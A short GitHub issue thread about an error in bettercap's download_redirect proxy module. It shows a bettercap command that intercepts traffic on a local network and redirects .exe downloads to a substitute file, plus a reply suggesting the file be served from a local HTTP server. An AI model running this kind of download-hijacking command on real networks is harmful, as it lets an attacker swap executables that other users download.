### ISSUE TITLE
module  download_redirect.rb

### ISSUE THREAD

**Issue by gavz** [evilsocket/bettercap-proxy-modules#48]
bettercap -v 1.6.0 - RaspberryPi3
attempt download putty.exe
bettercap -I enxb827eb666f47 -G 192.168.137.1 --proxy-module download_redirect.rb --find-extension "exe" --redirect-to-url "http://the.earth. l i/~sgtatham/putty/latest/w32/pscp.exe"

[W] Error with proxy module: no implicit conversion of nil into String

**Comment by laozi999** [comment]
"http://the.earth. l i/~sgtatham/putty/latest/w32/pscp.exe"

what's going on here?

try with:
`--httpd-port 8042 --httpd-path "/path/to/w32/" --redirect-to-url "http://X:8042/pscp.exe"`

(replace **X** with your local IP)

**Comment by evilsocket** [comment]
i really don't understand the point of this issue ... there's no debug log, no clear question ... what do u want me to do? XD
